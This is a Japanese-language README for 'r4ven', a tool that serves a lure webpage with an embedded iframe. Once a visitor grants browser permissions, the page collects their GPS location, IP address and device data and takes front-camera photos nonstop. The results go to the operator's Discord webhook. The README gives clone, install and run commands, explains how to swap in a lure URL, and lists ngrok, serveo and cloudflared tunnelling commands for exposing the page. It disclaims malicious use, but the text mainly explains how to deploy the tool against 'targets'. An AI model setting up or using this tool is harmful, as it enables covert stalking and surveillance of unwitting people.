
ユーザーのスマートフォンまたはPCのGPS位置情報を追跡し、対象の写真をキャプチャします。さらに、IPおよび端末情報も取得します。
このプロジェクトは、ユーザーが明示的に許可を与えた場合に、最新のWebブラウザがどのようにして位置情報、カメラアクセス、IPアドレス、デバイス情報を露出させる可能性があるかを示すために設計された、セキュリティ研究および啓発ツールです。
このツールは、デモンストレーション目的で正当なコンテンツを埋め込んだ制御されたWebページを提供します。ユーザーが自発的にブラウザの許可を与えると、アプリケーションはGPS座標、IP情報、デバイスの詳細、カメラ入力などの利用可能なメタデータを収集し、ソーシャルエンジニアリングや権限の悪用がどのように意図しないデータ漏洩につながるかを強調します。
このプロジェクトは、セキュリティ教育、啓発トレーニング、許可されたテストのみを目的としており、開発者、ペネトレーションテスター、ユーザーがブラウザの権限リスクをより深く理解し、プライバシー衛生を改善するのに役立ちます。
[!IMPORTANT] 概念実証 — 教育目的のみ
このプロジェクトは、ユーザーがブラウザの許可を与えた場合に、悪意のあるWebサイトがどのようにして位置情報、カメラアクセス、IPアドレス、デバイス情報を収集するかを示しています。 これはプライバシーリスクについての認識を高め、ユーザーが信頼できないリンクをクリックしたり不要な許可を承認したりすることを避けるべき理由を強調することを目的としています。
[!CAUTION] 倫理的かつ許可された使用のみ
このツールは現実世界の攻撃手法を示していますが、教育、セキュリティ研究、許可されたペネトレーションテストにのみ厳密に使用されなければなりません。 影響を受ける当事者の明示的な許可なしでの使用は強くお勧めしません。
+ IPアドレスとデバイス情報を自動的に取得します
! 位置情報の許可が許可された場合、ターゲットの正確な位置を取得します。
! カメラの許可が許可された場合、フロントカメラからノンストップでキャプチャします。
- GPSやカメラがないラップトップや電話では動作しません。
# JavaScriptをブロックするブラウザ、
# またはターゲットがGPS位置を偽装している場合。
# またはターゲットがVPNやIPスプーフィングを使用している場合。
- 一部のブラウザ(Brave、Safariなど)は位置情報とカメラの許可を自動的にブロックします
+ スマートフォンで使用すると位置精度がより正確になります。
- IPアドレスに基づく地理的位置は正確ではありません。
# ターゲットの位置を提供しません。
# 代わりに、ISP(インターネットサービスプロバイダー)のおおよその位置を提供します。
+ GPSは経度と緯度の座標を使用するため、ほぼ正確な位置を取得します。
@@ 位置情報の許可が与えられると @@
# ユーザーの位置から20〜30メートル以内の正確な位置情報が受信されます。
# (ほぼ正確な位置です)
git clone https://github.com/spyboy-productions/r4ven.git
cd r4ven
pip3 install -r requirements.txt
python3 r4ven.py
注: localhostを使用しない場合は、モジュール(all、cam、ip、gps)を選択し、index.htmlファイルを開き、"http://127.0.0.1:8000/image"を使用したいURLに置き換えてください。
または
別のURLを選択するには-tフラグを使用してください。
r4venを実行可能にするには次のコマンドを使用します:
chmod +x r4ven.py
python3 r4ven.py [-t target]
python3 r4ven.py [-p port]
python3 r4ven.py [-t target] [-p port]
Example: python3 r4ven.py -t https://example.com/r4ven/images -p 8000
Enter your discord webhook URL (set up a channel in your discord server with webhook integration)
https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks
if not have discord account and sever make one, it's free.
📍 トラック情報データはDiscordのWebhookチャンネルに送信されます。
index.htmlファイルを開いてiframe内のsrcを置き換えてください。(注:すべてのWebサイトがiframeをサポートしているわけではありません)⭓ ポートフォワーディングのその他のコマンド...
TryCloudflare: cloudflared tunnel --url http://localhost:8000
Tunnelmole: tmole 8000
Ngrok: ngrok http 8000
Ssh: ssh -R 80:localhost:8000 ssh.localhost.run
Serveo: ssh -R 80:localhost:8000 serveo.net
- ポートフォワーディングを必ず行ってください。そうしないとスマートフォンのブラウザでは動作しません。
コントリビューションと機能リクエストを歓迎します。問題が発生した場合や改善のアイデアがある場合は、遠慮なくIssueを開くかプルリクエストを送信してください。